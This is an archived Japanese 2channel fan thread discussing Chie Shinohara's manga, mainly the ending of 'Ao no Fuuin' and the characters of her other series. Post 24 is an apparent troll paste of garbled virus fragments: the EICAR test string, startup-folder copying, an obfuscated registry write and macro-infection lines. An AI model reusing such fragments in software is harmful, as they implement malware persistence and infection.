2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

篠原千絵 23

1 :花と名無しさん:2007/10/31(水) 00:28:15 ID:GlJuToJW0
主な作品は「天は赤い河のほとり」「闇のパープルアイ」「海の闇、月の影」
「蒼の封印」「陵子の心霊事件簿」「暁に立つライオン」「水に棲む花」(2006年2月終了)。
マジレス・キャラ萌え・妄想など何でもありで、まったり語り合いましょう。
荒らしと煽りは禁止&スルー、新スレ立ては970あたりを目安にお願いします。

前スレ 篠原千絵 22
http://anime2.2ch.net/test/read.cgi/gcomic/1176439471/
過去スレミラー(スレ17までを収録)
http://storage0272.at.infoseek.co.jp/comic/shinohara/

過去スレ・関連スレのURLは>>2-3を参照のこと。

2 :花と名無しさん:2007/10/31(水) 00:28:39 ID:???0
◆過去スレ
 篠原千絵ってどうですか? 1
 http://salad.2ch.net/gcomic/kako/964/964633365.html
 篠原千絵ってどうですか? 2
 http://salad.2ch.net/gcomic/kako/981/981512586.html
 篠原千絵ってどうですか? 3
 http://salad.2ch.net/gcomic/kako/985/985613117.html
 篠原千絵ってどうですか? 4
 http://salad.2ch.net/gcomic/kako/991/991444325.html
 篠原千絵ってどうですか? 5
 http://salad.2ch.net/gcomic/kako/995/995727274.html
 篠原千絵ってどうですか? 6
 http://comic.2ch.net/gcomic/kako/1000/10003/1000380227.html
 篠原千絵ってどうですか? 7
 http://comic.2ch.net/gcomic/kako/1008/10085/1008549676.html
 篠原千絵ってどうですか? 8
 http://comic.2ch.net/test/read.cgi/gcomic/1014528723/
 篠原千絵ってどうですか? 9
 http://comic.2ch.net/gcomic/kako/1021/10214/1021458373.html
 篠原千絵ってどうですか? 10
 http://comic.2ch.net/gcomic/kako/1029/10296/1029665127.html
 篠原千絵ってどうですか? 11
 http://comic.2ch.net/test/read.cgi/gcomic/1043155949/
 篠原千絵ってどうですか?12
 http://comic.2ch.net/test/read.cgi/gcomic/1055688656/

3 :花と名無しさん:2007/10/31(水) 00:28:55 ID:???0
 篠原千絵ってどうですか?13
 http://comic.2ch.net/test/read.cgi/gcomic/1066480088/
 篠原千絵ってどうですか?14
 http://comic4.2ch.net/test/read.cgi/gcomic/1076702089/
 篠原千絵ってどうですか?15
 http://comic6.2ch.net/test/read.cgi/gcomic/1085757573/
 【水に棲む花】 篠原千絵 16 【Betsucomi】
 http://comic6.2ch.net/test/read.cgi/gcomic/1097342942/
 水に棲む花  篠原千絵 17
 http://comic6.2ch.net/test/read.cgi/gcomic/1113265840/
 水に棲む花 篠原千絵 18
 http://comic6.2ch.net/test/read.cgi/gcomic/1125150627/
 水に棲む花  篠原千絵 19
 http://comic6.2ch.net/test/read.cgi/gcomic/1140673822/
 篠原千絵 20
 http://comic6.2ch.net/test/read.cgi/gcomic/1146407581/
 篠原千絵 21
 http://anime2.2ch.net/test/read.cgi/gcomic/1159800784/

◆関連スレ
 【篠原千絵】闇のパープルアイ
 http://comic6.2ch.net/test/read.cgi/rcomic/1121000026/

4 :花と名無しさん:2007/10/31(水) 00:38:05 ID:???0
前スレに間に合わなかった…orz

ホテルでエチィするシーンで終わりなんて嫌だよ
自分は、あのラストはあの後二人が結ばれたことを示唆しただけで
いわゆる『めでたしめでたし…』の意だと思ってたけど少数派、つか一人だけ?なのかなorz
でもさ、少女漫画なんだからそんな具体的に考えなくてもいいじゃんw

5 :花と名無しさん:2007/10/31(水) 00:42:45 ID:1+fTQplkO
それよりあの時期に環境問題を取り扱ったのが凄いと感じたかな。
どちらかというと高雄達に感情移入してしまった

6 :花と名無しさん:2007/10/31(水) 00:43:43 ID:???0
>>1
乙です。

>>4
アオカンスキーも結構だけど、新スレさえ立てずに話を続け、なおかつスレを
立てた人のお礼の一つも言えないのはどうかと思う。

7 :花と名無しさん:2007/10/31(水) 00:45:52 ID:???0
>>1さん乙です

8 :花と名無しさん:2007/10/31(水) 00:49:16 ID:???0
>>1
スレ立て乙。

>>4
少女漫画だからこそ夢が欲しかった。青姦で終わりなんて厭だと思った。
そう考える人間もいる。

>>5
同意。あの時代に環境問題を取り上げたのは早い方だと思う。一部の漫画家
しか取り上げていなかったから。

9 :花と名無しさん:2007/10/31(水) 00:51:02 ID:???0
お!新スレ立っておるの!!

>>1殿、乙ですじゃ

10 :花と名無しさん:2007/10/31(水) 00:52:18 ID:???0
キモスレが立ったね

11 :花と名無しさん:2007/10/31(水) 00:53:53 ID:???0
アオカンスキーだのガッツキ男だの頭おかしいのがいるなー。

12 :11:2007/10/31(水) 00:56:29 ID:???0
自分と意見が違うだけで、気持ち悪いきめ付けしてけなすのはやめれ。

13 :花と名無しさん:2007/10/31(水) 00:58:01 ID:???0
蒼の封印のラストシーンが好きな人もいるんだ・・・
人の好みって本当に様々なんだね

14 :花と名無しさん:2007/10/31(水) 01:02:30 ID:???0
>>13
別に普通のハッピーエンドのラストシーンとして捕らえてた
ただ、その後の蒼子はどうなったのか気になりはする


15 :花と名無しさん:2007/10/31(水) 01:05:33 ID:???0
>14だが間違えた
×捕らえてた
○捉えてた

16 :花と名無しさん:2007/10/31(水) 01:15:59 ID:???0
>>12>>11への反論かと思ったら同一人物だった。
オマエガナーってこういう時に使うんだろうな。

17 :11:2007/10/31(水) 01:21:31 ID:???0
アオカンスキーだのガッツキ男だの言う人間に対して「頭おかしい」って言ってるんだぞ。

18 :花と名無しさん:2007/10/31(水) 01:30:34 ID:???0
前スレ979=996=4=11=12=17が立ちバックと駅弁好きだということは把握したww

19 :花と名無しさん:2007/10/31(水) 02:08:24 ID:???0
ラストシーンもどうかと思うけど、それ以前の問題として、蒼子は彬のことを本当に
愛しているんだろうか。吊り橋理論を連想するんだよね。

とはいえ、蒼子は全てを失っている。一族・娘・蒼龍としての能力を失っただけで
なく、死んだことになっているから戸籍すらないだろうし、お金も持っていない筈。
一方の彬は何一つ失っていない。財閥の当主の座も白虎としての能力も。

蒼子は彬に頼り、すがる以外に生きていく道がない。そんな隷属状態の蒼子に、
彬を魅了し続けることが出来るんだろうか?
考えれば考えるほど、蒼子の未来は茨の道だという気がしてならない。

20 :花と名無しさん:2007/10/31(水) 02:44:35 ID:???0
>>1 乙です~

21 :花と名無しさん:2007/10/31(水) 03:27:41 ID:???0
自分も蒼の封印のラストは、普通にハッピーエンドだと信じて疑わなかったクチ。
下が岩だから痛いだろうって事よりも、ようやく二人が結ばれて良かったなとしか。

蒼子が普通の人間になりさえすれば、
西家の人たちも彬との結婚は反対しても殺しまではしないだろうと思ってたし。
そして反対されたら駆け落ちすればいいじゃないかと。
どうせ西家にはそれなりの力を持ってる跡継ぎ候補がまだ二人もいるのだし。

お金がない事などに関しては、ほとんど身一つで海外逃亡した暁生と麻衣が後日談で大成したらしいので、
ご都合でどうにでもなるかなと。

22 :花と名無しさん:2007/10/31(水) 03:55:44 ID:???0
蒼のラストは好きではないが、別に文句もない。
外なら岩場じゃなくてお花畑とか少しはロマンチックなかんじにすればいいのに、とは思ったけど。
あれはただの演出でしょ?「2人はやっとのことで結ばれて、そうこは人間に戻りました」
ということを示唆するためだけのもの。

すごい山奥の火山噴火口で壮大な何かをやったあとに、ヘリでホテルへ行ってセクースは
最終回のロケ地としては尻すぼまりすぎでは。岩場も良いとはまったく思わんけど、
処女なのにとか思いやりがないとか、そういうのはなんか違うと思う。

23 :花と名無しさん:2007/10/31(水) 07:22:32 ID:???O
>>1
おっつー

アオカン話が盛り上がっててワロタ

24 :花と名無しさん:2007/10/31(水) 07:43:44 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


25 :私だけじゃ ◆Vqr/JTiKqY :2007/10/31(水) 09:27:44 ID:???0
新スレおめ

26 :花と名無しさん:2007/10/31(水) 14:54:05 ID:???0
>>22同意。
たかが少女マンガ=フィクションなのにムキになって否定するほどのことでもないと思う。>アオカン
それにしても、前スレ979は書き込み直後に素直にごめんってレスしてオトナな対応してるのに、
新スレに移動してまで>>18みたいな書き込みがあってうんざりだ。すげー子供。やっぱ処女?

27 :花と名無しさん:2007/10/31(水) 15:52:23 ID:???0
>すげー子供。やっぱ処女?
この煽りをするオマエモナー。そういうオレモナー。
過疎スレが伸びていると思ったら、罵りあいかい。

28 :花と名無しさん:2007/10/31(水) 17:11:04 ID:???0
>>26
そんなにムキになるほどの事でもないってのは同意だし
確かに「処女に対して思いやりがない」とか笑っちゃうけど
少女漫画だし、処女の妄想爆発雑誌での連載でもある訳で
子供でも処女でも仕方ないんじゃないか?
そこは突っ込んでもな…と思う。



29 :花と名無しさん:2007/10/31(水) 21:56:56 ID:???0
処女の妄想爆発雑誌>笑った

ただこのスレは平均年齢高そうだし(少なくとも二十歳以上って感じ)
処女はいないだろ、さすがに
漫画読む時だけ乙女返りしてるんじゃないか?

それにしてもあのシーン一つでアオ○ンだの、思いやりがないだの考えすぎだ
いつもそこまで想像めぐらして漫画読んでるのか?ある意味凄いな
>19さんのようなラストの先にある展開の想像なら自分もするし
健全だと思うけど




30 :花と名無しさん:2007/10/31(水) 22:49:50 ID:???O
思いやりがないとまでは思わなかったけど
(どうせ、いつでもどこでも灰になるまでやるんだろうし)
膝がすりむけるのは心配になったよ
花畑とかならまだよかったのにね、土がマソコに入って炎症起こす程度だから

31 :花と名無しさん:2007/10/31(水) 23:58:16 ID:???0
自分も「こうして蒼子は人間になりましためでたしめでたし」としての
アオカンシーンだったんだろうなーと解釈してた。
いわゆるお約束というか。

確かに今冷静に考えれば、岩の上でヤルのは痛いだろうなーとは思うけど
読んでたときは軽く流してたよ。
つかセックス描写にそこまで思いいれをもって読む人っているんだな。


自分はそんな事よりももっと根本的に突っ込みたいストーリー展開の方が。。。w

32 :花と名無しさん:2007/11/01(木) 00:43:51 ID:???0
アオカンスキーとガッツキ男という言葉が、乙女と処女のハートを傷つけたことだけは分かったよ。
あのラストは少コミの王道だからねww

33 :花と名無しさん:2007/11/01(木) 00:54:20 ID:???0
毛布でも敷けばよかったんだよ、あの男

34 :花と名無しさん:2007/11/01(木) 01:07:36 ID:???0
いそいそと毛布を敷く彬なんて見たくないやい

35 :花と名無しさん:2007/11/01(木) 01:25:49 ID:???0
>>21
隠れ屋によって白虎としての力を最大限身につけた彬でも、不死の高雄には
勝てない。その上高雄サイドには、蒼龍を継ぎ蒼子より非情になれる緋子が
いるのだから、西家の他の二人では勝ち目は全くないと思う。

なので、彬に西家当主としての自覚があるなら、駆け落ちなんて暢気なことは
していられないかと。高雄たちが和解を無かったことにして、再攻撃してくるかも
しれないのだから。

それに叔父さんの立場からしたら、彬の能力を子孫により多く伝えることで、
高雄たちへの対抗策としたい筈。
「蒼子を殺さないでやるから、その代わりに西家の女との間に子を作り白虎の
能力を伝えろ」と言われたら、高雄への対抗意識の強い彬は断れなさそう。

36 :花と名無しさん:2007/11/01(木) 08:42:39 ID:???O
だとしても、そんなの別にセックスしなくても済むじゃん
ホワイトシロップを試験管に入れてやれば無問題!
俺の〇〇〇゜は蒼たん専用!

37 :花と名無しさん:2007/11/01(木) 13:19:08 ID:???0
ラスト近くで、叔父が「百個の仰せのままに」と返答するシーンがあったから、
西家における力関係は彬>叔父に移行したと解釈してるので
叔父の暴走(独断)は無いと踏んでるんだがどうだろ?
それを抜いても、別れそうなカップルにしか思えないがwww

38 :花と名無しさん:2007/11/01(木) 21:28:54 ID:???0
>>37
叔父さん、頭を下げてそう言ってたね。
ただ実際に西家を切り回していたのは叔父さんだったみたいだから、彬が財閥の長としての
力を徐々に身につけていけば彬>叔父さんになると思うけど、ラストシーン辺りの力関係は
暫定的な彬=叔父さんじゃないかなぁ。

叔父さんが「仰せのままに」でいる間は彬>叔父さんだけど、そうじゃなくなったら簡単に
ひっくり返されてしまうような、不安定な力関係。
蒼子を連れて帰るなんて話は叔父さんにとって寝耳に水だろうから、「仰せのままに」で
いつまでもいられるかどうか。
百個にはワロタw

39 :花と名無しさん:2007/11/01(木) 22:56:41 ID:???O
あの叔父さんは絶対そのうち活躍すると信じてたよ。
でも期待外れでした。

40 :花と名無しさん:2007/11/02(金) 21:25:47 ID:???0
それは自分もちと思う。
あとマユミという中途半端ウザキャラがいたけど軽くイラつくくらいで
大した事何もしでかさなかった。主役カップルのチラ邪魔をするだけに
存在するようなキャラになってしまっているので残念。

41 :花と名無しさん:2007/11/02(金) 23:04:33 ID:???0
マユミがチラ邪魔してたのって、蒼子の美貌に嫉妬してたってのもあったんだろうね。
身内の恋人が超美人なのって、やっぱ女としてはおもしろくなかったんだと思う。

42 :花と名無しさん:2007/11/03(土) 10:04:38 ID:???0
百個側は彬以外美形がいないっていうのもなんかなぁ。
彬の母親だけがが美人だったのかもしれんけどさ。
せめてまゆみはそれなりに美人に書いてあげてほしかったなぁ。
天河のセルト姫みたいに、キツイ美人みたいな感じで。

43 :花と名無しさん:2007/11/03(土) 11:39:02 ID:???0
今手元に無くて判らないんだけど、まゆみって彬の異母兄弟?で彬に迫ったひとだっけ。

44 :花と名無しさん:2007/11/03(土) 14:06:54 ID:???0
>>43
うん、そう。
彬の兄弟で、蒼子に食われた長男もいたっけ。
名前忘れたけど。

45 :花と名無しさん:2007/11/03(土) 15:44:30 ID:???0
>>44
椋(りょう)じゃなかったっけ?長男の名前。
こいつとマユミが同母兄妹だ。目がおなじ。
私的には楷が蒼封で一番好きなキャラだった。

46 :花と名無しさん:2007/11/03(土) 16:35:16 ID:???0
>>44
dクスです。
そういや影の薄い長男もいたよね・・・忘れてたw

47 :花と名無しさん:2007/11/03(土) 23:08:17 ID:???0
自分はロマンチストな高雄とその男前な娘が好きだった。
眠りに就く時「考えた分だけ、寝顔を見る時間が出来たね。お父さん」と
永遠に実体なしで生き続ける父親を思いやる事が出来るいい子だった。
それに引き換え(ry

48 :花と名無しさん:2007/11/04(日) 01:47:37 ID:???0
自分も蒼の封印ではカイが一番好きだったなー。


高雄はあんま好きじゃなかったw
恋愛思考主義というか、恋愛体質のキャラはあんま好きじゃない。
流水なんかは恋愛体質だけど、嫌いじゃないんだけどね。
この差は一体なんなんだろ。


当然蒼の封印主人公カップルも好きじゃなかった。。。w

49 :花と名無しさん:2007/11/04(日) 03:04:17 ID:???0
しかし篠原スレが蒼封の話題のみでここまで伸びるなんて初めてじゃないか?w
今までは天河関連が一番多かったような気がする。

50 :花と名無しさん:2007/11/04(日) 03:08:57 ID:???0
しかも青姦の話題が続いたしねw

51 :花と名無しさん:2007/11/04(日) 20:47:00 ID:???0
蒼封で青姦ってすごい語呂

52 :花と名無しさん:2007/11/04(日) 21:15:49 ID:???O
まあ駄作だけどね

53 :花と名無しさん:2007/11/04(日) 21:22:10 ID:???0
水っ洟に比べたらマトモ

54 :花と名無しさん:2007/11/04(日) 22:10:22 ID:???0
今更だけど、
図書館にワールドガイドがあったので、
借りてみた。入ってると思わなかったのでびっくり。

55 :花と名無しさん:2007/11/05(月) 01:35:45 ID:???0
>>47
あのシーン良かったよね。高雄は嬉しさのあまり、きっと締りの無い顔になって
いただろうなw

56 :花と名無しさん:2007/11/05(月) 01:50:59 ID:???0
短編の話持ち込んでいいですか?
ずっと気になってたんだけど「そして5回の鈴が鳴る」って警察の捜査があまりにずさんだと思うw
操られてた愛子が初めて殺人を犯した直後、克巳に公衆電話から電話かけてるよね。
血まみれの手で。
駆け付けた克巳がマフラーで拭ったけど、薬品ぶっかければ血液反応まちがいなく出る。
直前に掛けた番号を割り出せば、かけた人間が愛子だってソッコーわかりそうなのに愛子にはノーマーク。
あとラブホで殺した時も、受付の人間が愛子の顔を見てると思うのだが。(顔見られなくて済むラブホだったかもしれんが。)
殺人の瞬間を映したビデオテープもただ川に投げ捨ててたけどそんなんで安心できるのか?
フツー燃やしたりしない?
など、妙な心配が尽きない作品だった。

57 :花と名無しさん:2007/11/06(火) 18:07:06 ID:???0
悪いけど、少女漫画でそこまで細かいことに、
こだわって読んでないよ。
雑誌掲載時は小学生〜中学生向けだし、
あんまりリアリティを追及しても面白くないでしょ。

58 :花と名無しさん:2007/11/06(火) 18:11:40 ID:???0
10代の頃はその辺は気にならなかったが
愛子に憑依せずとも人殺しを実行出来る能力がある元彼女(幽霊)に
「それなら最初から、ヒロインの手を借りずに復讐すればいいやん」と思った事はある。

59 :花と名無しさん:2007/11/06(火) 19:40:12 ID:???0
>>58
誰よりも憎い女の手を血に染めてやりたかったんじゃない?

60 :花と名無しさん:2007/11/06(火) 19:49:33 ID:???0
>>57
同感 それに、正しい殺人の手段みたいの教えるべきでもない。
じゃなくてもTVだので知れてしまう(掲載当時でも)のだもの。

61 :花と名無しさん:2007/11/08(木) 12:25:06 ID:???0
>>60
だよね。
そもそもこの人の漫画って、突っ込みどころ満載だし。
そういうのを気にしてたら全く面白くない。

62 :花と名無しさん:2007/11/08(木) 14:39:46 ID:???0
人間が豹に変身できるか、ってところから初めなきゃならんw

63 :花と名無しさん:2007/11/08(木) 17:41:41 ID:???O
NHKに鬼女伝説&鬼無里きたw


64 :花と名無しさん:2007/11/09(金) 01:57:39 ID:z9CXBsZi0
久しぶりに見たらえらく伸びてたので
新刊でも出るのかとドキドキしながらスレ開いてみたら
やっぱりorzな展開だったwww

篠原作品に関しちゃ、あんまし深く考えない性質のせいか
過去スレも含めてここで指摘されてるような矛盾には
全然気づかなかったな。

で、最近は先生は何やってんの?霧の森ホテル?
天河外伝(カイルとザナンザのやつ)はもう終わったんでしょ??

65 :花と名無しさん:2007/11/09(金) 22:29:58 ID:???0
昨日発売のプチコミに
霧の森ホテルの新作載ってたよ

66 :花と名無しさん:2007/11/11(日) 16:40:47 ID:???0
過去ログが読めないので教えて欲しいのだけど
「水に棲む花」って完結時のここの反応はどうだったの?
最近、読んでみて、篠原作品の中で一番つまらなかったからさ

67 :花と名無しさん:2007/11/11(日) 17:18:15 ID:???O
けちょんけちょんの中に擁護がたまにいる感じだったよ。

68 :花と名無しさん:2007/11/12(月) 01:58:25 ID:???0
>>67
ありがとう。
けちょんけちょんでしたかw

69 :花と名無しさん:2007/11/12(月) 14:48:39 ID:???O
ブコフで海闇18巻読んできた。
流水の死に顔が綺麗だった

70 :花と名無しさん:2007/11/12(月) 16:02:02 ID:???0
>>69
憑き物がとれたような安らかな顔だったよね。
生まれ変わって来ることができるなら、今度こそ相思相愛の幸せな恋をしてほしいと思ったよ。

71 :花と名無しさん:2007/11/12(月) 22:45:10 ID:???0
生き残った流風、よく結婚式?までできたと思うわ。姉がウイルスで人を操り、自分も殺人して浮いて壁抜けて・・
その後能力使わなくてもすんごい迫害受けるだろうに。長女も次女も気がついたら死んでて両親もカワイソス。
闇パは2人以外迷惑かからないし、蒼子は財力で守られるし。

72 :花と名無しさん:2007/11/13(火) 00:07:40 ID:???0
披露宴までやったらさすがにモニョるけど、結婚式(挙式のみ)だったらいいんじゃね?
流風と克之、二人だけでひっそりと挙げたのかもしれないし。
闇パの慎ちゃんと倫子みたいに。
てか本編では結婚式シーンなんてなかったよね。付録かなんか?結婚式シーンのイラストって。
あれは「その後二人は結ばれました」っていう読者に対する報告として受け取ればいいだけのような気がするけど。

73 :花と名無しさん:2007/11/13(火) 02:18:04 ID:???0
数年前に文庫で読んだ人ですが、結婚式なんてあった?
全然覚えがないや
両親も生きてたんだっけ?
なんか篠原作品はデフォルトで父母は亡くなっている(いく)と
思い込んでいました

74 :花と名無しさん:2007/11/13(火) 08:51:09 ID:???0
連載終了時のテレカだから以降収録されてないのかな?
http://www.teleca.net/cargo/goodslist.php?sc_id=1697  ここ見ればあるよ 蒼封7万w

75 :花と名無しさん:2007/11/13(火) 12:50:10 ID:???O
コミック巻末のイラストギャラリーに
そんなような絵があった気がする

76 :花と名無しさん:2007/11/13(火) 14:37:41 ID:???0
>>74
4500円・・手が出ねーわw

77 :花と名無しさん:2007/11/13(火) 17:13:03 ID:???0
>>74
おー!!コレか!!過去スレで存在を知ってからずっと気になってたんだよ。
初めて見たよ。ありがd!

78 :花と名無しさん:2007/11/18(日) 19:00:42 ID:Cjidi+sf0
次の連載が待ち遠しいです。

79 :花と名無しさん:2007/11/21(水) 04:29:15 ID:???O
みんな流風好きで一人だけ流水好きだったから寂しがった

80 :花と名無しさん:2007/11/21(水) 16:16:53 ID:???0
ここ(2ch)じゃ流水のが人気高いよ。
ちなみに私はどっちもあんまり好きじゃなかったな・・・。
流風のお人好し&カマトトぶりにはイライラさせられたし、
流水のストーカーぶりには同じ女として見苦しいものを感じた。

81 :花と名無しさん:2007/11/21(水) 16:39:01 ID:???0
流水&流風に関しては、克之がそこまでして取り合う程のいい男だと思えなかったってのもあるだろうね。

加えて、克之は流水に対して全くその気がなかったってだけでなく、
どこか見下してたような感じもしたから(まあそれは流水にも原因があるのだけど)、
そんな扱いされても欲しかったってプライドないのか?とも思ったし。

82 :花と名無しさん:2007/11/21(水) 16:51:24 ID:???0
>>81
>どこか見下してたような感じもしたから(まあそれは流水にも原因があるのだけど)、

それ私も思ってた。
コミクス1巻で「足つったから見て」ってウソついた流水を克之が軽くあしらうところがあったけど、
あれじゃますます流水の神経逆撫でするだけじゃんと思った。
ヒロイン以外の女から想われるという点ではカイルもそうだったけど、
カイルだったらあんな言い方しないだろうなぁ。
もっとオトナなスマートな文句で「貴女にその気はない」ということを伝えるだろうなと思った。

83 :花と名無しさん:2007/11/21(水) 17:16:44 ID:???O
克之は自分も微妙だったなぁ。
八年ぶりに読み直しても好きになれなかった。
彼より犬のほうがかっけよかったしw

84 :花と名無しさん:2007/11/21(水) 17:43:25 ID:???O
なんでこの人盗作漫画家とか言われてるの?
心霊ものとか面白くて普通に好きなのに

85 :花と名無しさん:2007/11/21(水) 18:15:50 ID:???0
全ては王家厨の陰謀

86 :花と名無しさん:2007/11/21(水) 18:19:15 ID:???0
>>84
その話はもうループしすぎてうんざりなので
悪いが過去スレ検索するかぐぐってくれ


87 :花と名無しさん:2007/11/21(水) 18:56:40 ID:???O
>>86
あ、すいませんでしたorz

88 :花と名無しさん:2007/11/21(水) 19:04:51 ID:???0
>>87
よく考えてから描きこめや

89 :花と名無しさん:2007/11/21(水) 19:05:25 ID:???0
>>82
ウルスラに対しては元々カイルを本気で好きな訳じゃなかったし、
ユーリを危機に追いやった犯罪者だからあの対応は妥当だと思うし、
それ以外のギュゼル姫などに対しては確かに紳士的にやんわり断ってそうだよね。

90 :花と名無しさん:2007/11/22(木) 01:40:43 ID:???O
>>88
謝罪してんだからスルー汁。

91 :花と名無しさん:2007/11/22(木) 19:19:15 ID:???0
>>83
シンのかっこよさは異常

92 :花と名無しさん:2007/11/22(木) 22:43:33 ID:???0
ちょwwwwwヒーローが犬に負けるのかよ。
シンの最期は男前というより、フランダースの犬だな。


93 :花と名無しさん:2007/11/23(金) 00:06:20 ID:???0
シンの最期は何度見ても泣く。
展開わかっていても泣く。


動物で死にネタは卑怯だ。
でも大好きだ。

94 :花と名無しさん:2007/11/23(金) 00:27:20 ID:???0
真由夏ちゃんが迎えに来てくれたのがせめてもの慰めだった。

95 :花と名無しさん:2007/11/23(金) 00:43:49 ID:???0
ポウが焼かれてしまった時は何とも思わなかった・・

96 :花と名無しさん:2007/11/23(金) 06:40:55 ID:???0
>>95
オリジナルポウは最初の時点で死んでたし、
ずっと中だった人は元の身体に戻れたからじゃない?
肉体ではなく精神が死んだってのが重要なのかと。

97 :花と名無しさん:2007/11/23(金) 13:27:27 ID:???0
仲の人がいたおかげで腐乱を免れてたんだよね、ポウ

98 :花と名無しさん:2007/11/27(火) 22:11:38 ID:???0
この作者のファッションセンスはもう既に諦めているけれど、
それにしたって鬼の棲家に向かう時の楷の半ズボンwはひどいと思う・・・。

99 :花と名無しさん:2007/11/27(火) 23:49:54 ID:???0
リア工で闇パを読んでいたが、田舎の女子高生から見ても
男性のセンターシームのパンツ多用はオッサンくさくていただけなかったな。

100 :花と名無しさん:2007/11/28(水) 19:18:44 ID:???O
ユーリが現代から古代にタイムスリップした際の服も。
デートなのにあの服装は…とオモタ。
制服は似合ってたけど。

101 :花と名無しさん:2007/11/29(木) 00:22:13 ID:???0
ガーリーな格好のユーリって
想像できない

102 :花と名無しさん:2007/11/29(木) 01:03:01 ID:???0
頭ボサボサだしねw

103 :花と名無しさん:2007/11/29(木) 20:21:06 ID:???0
性格からして
身軽で動きやすい服好みそうだなあ
元気娘だし

104 :花と名無しさん:2007/11/29(木) 22:19:50 ID:???0
ボンバーヘッドというか、アフロというか

    ,.:::.⌒⌒:::::ヽ
   (::::::::::::::::::::::::::::)
 (( (::::::::::::::人:::::::::ノ
   (::::(´・∀・`):ノ ))
   (( ( つ ヽ、
     . 〉 とノ i ))
     (__ノ^(_)

105 :花と名無しさん:2007/11/29(木) 23:05:22 ID:???0
流水と流風がイアンとクリスと闘った時のあの短パン、タンクトップが一番ださい
よく街中歩けたなと今でも思う

106 :花と名無しさん:2007/11/29(木) 23:07:24 ID:???0
逆に質問。
篠原さんの描いた衣装でセンスいいと思ったのはどれ?

107 :花と名無しさん:2007/11/29(木) 23:32:39 ID:???0
今読み返してきた。
該当なし・・先生ホントごめん。

108 :花と名無しさん:2007/11/29(木) 23:39:22 ID:???0
やっぱり、何も着せないほうが・・・

109 :花と名無しさん:2007/11/29(木) 23:55:32 ID:???0
倫子が変身後人間に戻ったとき
男物のシャツ一枚着ていたのが色っぽいなぁ
とドキドキしていた消防の頃。今思うとオヤジくさい趣味だ。

110 :花と名無しさん:2007/11/29(木) 23:56:05 ID:???0
倫子の、裸に男物のシャツ1枚w

111 :花と名無しさん:2007/11/29(木) 23:57:18 ID:???0
>>109
ちょww 被りすぎてビビったwww

112 :109:2007/11/29(木) 23:58:43 ID:???0
>>111
式はいつにする?

113 :111:2007/11/30(金) 00:02:29 ID:???0
>>112
おヒゲの優しい神父さまがいる教会ですぐにでも・・・w


あの神父さま好きだったなぁ

114 :109:2007/11/30(金) 00:07:28 ID:???0
ふつつかものですがw
同じ漫画が好きだと趣味もかぶるもんなんかねww

いいひとほど酷い死に方するのが篠原クオリティ。
神父さんとハイキングカップルは未だに印象に残ってる。

115 :111:2007/11/30(金) 00:16:37 ID:???0
男物のシャツ1枚
って、好きな漫画とかじゃなくて
個人的に趣味が被ってるねw

脇役じゃないけど、l小田切さんもなぁ
酷くて格好いい最期だった
でも、ダイナマイトってキバで噛んだだけで
爆発するもんなのかな?と思った

116 :109:2007/11/30(金) 00:32:47 ID:???0
>>111と一緒なら旨い酒が飲めそうだ。確かに趣味のツボが被り杉w
でもさすがにあんまスレ私物化しちゃマズイなww


改めて考えるとこの人の漫画はメイン、脇役とも死にっぷりがいいキャラが多い。
キャラよりもまずストーリーありき、ってインタビューでも答えてたし
キャラ萌えに走らないのがウェットになり過ぎなくて効果的なのかもしれないな。


117 :花と名無しさん:2007/11/30(金) 06:10:52 ID:???0
>>113-114
あの神父さまは、純粋に親切心だけで曽根原に連絡してくれたのだけど、
リアルタイムで読んでた読者は「余計なことをーー!!」の嵐だったんだろうなw
まあ神父さまが知らせなくても、あの三人はいずれ捕まる運命だったのだろうけど。
一番幸せになって欲しかったのに、一番不幸になってしまったカップルだった。

慎ちゃんなら、倫子との間に自分の実子が出来ても、麻衣の事も変わらず可愛がってくれただろうし。
それとも、もしまた変身人間だったら不幸な人生を歩ませる事になるから、あえて作らなかったかな?

118 :花と名無しさん:2007/11/30(金) 13:48:51 ID:???O
>>115
あれは牙で噛んだのではなく警察が発砲した弾が当たって爆発したのでは?

119 :花と名無しさん:2007/11/30(金) 16:26:30 ID:???0
神父さまで思い出したけれど
教会にウェディングドレスが常備されている事は…突っ込んではいけないだろうなwww

120 :花と名無しさん:2007/11/30(金) 17:01:04 ID:???0
>>119
過去にそこで挙げたカップルが、記念か願掛けとして置いてったとかじゃ?
その辺の説明って特にされてなかったんだっけ?

121 :111:2007/11/30(金) 17:13:47 ID:???0
>>116
他にも"男物のシャツ1枚"が好きなひとはいると思うw
けどここら辺にしておきましょうw>私物化

>>117
ああぁぁ連絡すんなーーーーっ!!
‥って思ったw

>>118
漫画が手元にないから分からないんだけど、
確か噛んだと思うんだよなぁ
「ガキッ」って音がした気がw


漫画は名作だけど、ドラマは迷作だったなー
今ドラマ化するとしたら、倫子は誰がいいかな?
容姿だとガッキーかなぁ

122 :花と名無しさん:2007/12/01(土) 14:49:50 ID:???0
ドラマ版闇パは男性をターゲットにしていると信じている。

123 :花と名無しさん:2007/12/01(土) 21:04:45 ID:???0
>>106
蒼子が彬と共に元住んでいた場所に行く時の服装は
そこそこ可愛かった、ような気が。


コミックス持ってないから確認できないけどw

124 :花と名無しさん:2007/12/03(月) 13:36:52 ID:???O
これかな?
http://imepita.jp/20071203/487380
http://imepita.jp/20071203/486960
http://imepita.jp/20071203/484260


33 KB
■ このスレッドは過去ログ倉庫に格納されています

